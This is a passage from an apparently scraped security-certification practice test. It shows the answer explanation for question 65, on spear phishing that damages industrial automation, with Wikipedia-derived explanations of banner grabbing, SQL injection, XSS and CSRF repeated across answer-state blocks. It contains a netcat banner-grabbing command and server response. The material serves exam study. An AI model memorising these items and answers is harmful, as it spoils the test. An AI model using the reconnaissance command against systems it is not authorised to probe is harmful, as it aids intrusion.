strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database. Cross-site scripting https://en.wikipedia.org/wiki/Cross-site_scripting Cross-site scripting (XSS) is a type of security vulnerability typically found in web applications. XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec up until 2007. XSS effects vary in range from petty nuisance to significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site‘s owner network. Cross-Site Request Forgery https://en.wikipedia.org/wiki/Cross-site_request_forgery Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF (sometimes pronounced sea-surf) or XSRF, is a type of malicious exploit of a website where unauthorized commands are submitted from a user that the web application trusts. There are many ways in which a malicious website can transmit such commands; specially-crafted image tags, hidden forms, and JavaScript XMLHttpRequests, for example, can all work without the user‘s interaction or even knowledge. Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user‘s browser. In a CSRF attack, an innocent end-user is tricked by an attacker into submitting a web request that they did not intend. This may cause actions to be performed on the website that can include inadvertent client or server data leakage, change of session state, or manipulation of an end user‘s account.
Unattempted
https://en.wikipedia.org/wiki/Banner_grabbing Banner Grabbing is a technique used to gain information about a computer system on a network and the services running on its open ports. Administrators can use this to take inventory of the systems and services on their network. However, an intruder can use banner grabbing in order to find network hosts that are running versions of applications and operating systems with known exploits. Some examples of service ports used for banner grabbing are those used by Hyper Text Transfer Protocol (HTTP), File Transfer Protocol (FTP), and Simple Mail Transfer Protocol (SMTP); ports 80, 21, and 25 respectively. Tools commonly used to perform banner grabbing are Telnet, Nmap and Netcat. For example, one could establish a connection to a target web server using Netcat, then send an HTTP request. The response will typically contain information about the service running on the host: [root@prober]# nc http://www.targethost.com 80 HEAD / HTTP/1.1 HTTP/1.1 200 OK Date: Mon, 11 May 2009 22:10:40 EST Server: Apache/2.0.46 (Unix) (Red Hat/Linux) Last-Modified: Thu, 16 Apr 2009 11:20:14 PST ETag: “1986-69b-123a4bc6“ Accept-Ranges: bytes Content-Length: 1110 Connection: close Content-Type: text/html Incorrect answers: SQL injection https://en.wikipedia.org/wiki/SQL_injection SQL injection is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application‘s software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database. Cross-site scripting https://en.wikipedia.org/wiki/Cross-site_scripting Cross-site scripting (XSS) is a type of security vulnerability typically found in web applications. XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec up until 2007. XSS effects vary in range from petty nuisance to significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site‘s owner network. Cross-Site Request Forgery https://en.wikipedia.org/wiki/Cross-site_request_forgery Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF (sometimes pronounced sea-surf) or XSRF, is a type of malicious exploit of a website where unauthorized commands are submitted from a user that the web application trusts. There are many ways in which a malicious website can transmit such commands; specially-crafted image tags, hidden forms, and JavaScript XMLHttpRequests, for example, can all work without the user‘s interaction or even knowledge. Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user‘s browser. In a CSRF attack, an innocent end-user is tricked by an attacker into submitting a web request that they did not intend. This may cause actions to be performed on the website that can include inadvertent client or server data leakage, change of session state, or manipulation of an end user‘s account.
Question 65 of 65
65. Question
The attacker created a fraudulent email with a malicious attachment and sent it to employees of the target organization. The employee opened this email and clicked on the malicious attachment. Because of this, the malware was downloaded and injected into the software used in the victim‘s system occurred. Further, the malware propagated itself to other networked systems and finally damaging the industrial automation component. Which of the following attack techniques was used by the attacker?
Correct
Spear Phishing Attackers send fake emails containing malicious links or attachments that seemingly originated from the victim‘s legitimate or well-known sources. When the victim clicks on the link or downloads the attachment, it injects malware, starts damaging the resources, and spreads itself to other systems. For example, an attacker sends a fraudulent email with a malicious attachment to a victim system that maintains the sales software of the operational plant. When the victim downloads the attachment, the malware is injected into the sales software, propagates itself to other networked systems, and finally damages industrial automation components. Incorrect answers: HMI-based attack HumanMachine Interfaces (HMlIs) are often called HackerMachine Interfaces. Even with the advancement and automation of OT, human interaction and control over the operational process remain challenges due to the underlying vulnerabilities. The lack of global standards for developing HMI software without any defense-in-depth security measures leads to many security problems. Attackers exploit these vulnerabilities to perform various attacks such as memory corruption, code injection, privilege escalation, etc. on target OT systems. SMishing attack Smishing is a form of phishing that uses mobile phones as the attack platform. The criminal executes the attack with an intent to gather personal information, including social insurance and/or credit card numbers. Smishing is implemented through text messages or SMS, giving the attack the name SMiShing. Reconnaissance attack Reconnaissance attacks are general knowledge gathering attacks. These attacks can happen in both logical and physical approaches. Whether the information is gathered via probing the network or through social engineering and physical surveillance, these attacks can be preventable as well. Some common examples of reconnaissance attacks include packet sniffing, ping sweeping, port scanning, phishing, social engineering and internet information queries.
Incorrect
Spear Phishing Attackers send fake emails containing malicious links or attachments that seemingly originated from the victim‘s legitimate or well-known sources. When the victim clicks on the link or downloads the attachment, it injects malware, starts damaging the resources, and spreads itself to other systems. For example, an attacker sends a fraudulent email with a malicious attachment to a victim system that maintains the sales software of the operational plant. When the victim downloads the attachment, the malware is injected into the sales software, propagates itself to other networked systems, and finally damages industrial automation components. Incorrect answers: HMI-based attack HumanMachine Interfaces (HMlIs) are often called HackerMachine Interfaces. Even with the advancement and automation of OT, human interaction and control over the operational process remain challenges due to the underlying vulnerabilities. The lack of global standards for developing HMI software without any defense-in-depth security measures leads to many security problems. Attackers exploit these vulnerabilities to perform various attacks such as memory corruption, code injection, privilege escalation, etc. on target OT systems. SMishing attack Smishing is a form of phishing that uses mobile phones as the attack platform. The criminal executes the attack with an intent to gather personal information, including social insurance and/or credit card numbers. Smishing is implemented through text messages or SMS, giving the attack the name SMiShing. Reconnaissance attack Reconnaissance attacks are general knowledge gathering attacks. These attacks can happen in both logical and physical approaches. Whether the information is gathered via probing the network or through social engineering and physical surveillance, these attacks can be preventable as well. Some common examples of reconnaissance attacks include packet sniffing, ping sweeping, port scanning, phishing, social engineering and internet information queries.
Unattempted
Spear Phishing Attackers send fake emails containing malicious links or attachments that seemingly originated from the victim‘s legitimate or well-known sources. When the victim clicks on the link or downloads the attachment, it injects malware, starts damaging the resources, and spreads itself to other systems. For example, an attacker sends a fraudulent email with a malicious attachment to a victim system that maintains the sales software of the operational plant. When the victim downloads the attachment, the malware is injected into the sales software, propagates itself to other networked systems, and finally damages industrial automation components. Incorrect answers: HMI-based attack HumanMachine Interfaces (HMlIs) are often called HackerMachine Interfaces. Even with the advancement and automation of OT, human interaction and control over the operational process remain challenges due to the underlying vulnerabilities. The lack of global standards for developing HMI software without any defense-in-depth security measures leads to many security problems. Attackers exploit these vulnerabilities to perform various attacks such as memory corruption, code injection, privilege escalation, etc. on target OT systems. SMishing attack Smishing is a form of phishing that uses mobile phones as the attack platform. The criminal executes the attack with an intent to gather personal information, including social insurance and/or credit card numbers. Smishing is implemented through text messages or SMS, giving the attack the name SMiShing. Reconnaissance attack Reconnaissance attacks are general knowledge gathering attacks. These attacks can happen in both logical and physical approaches. Whether the information is gathered via probing the network or through social engineering and physical surveillance, these attacks can be preventable as well. Some common examples of reconnaissance attacks include packet sniffing, ping sweeping, port scanning, phishing, social engineering and internet information queries.
X
Use Page numbers below to navigate to other practice tests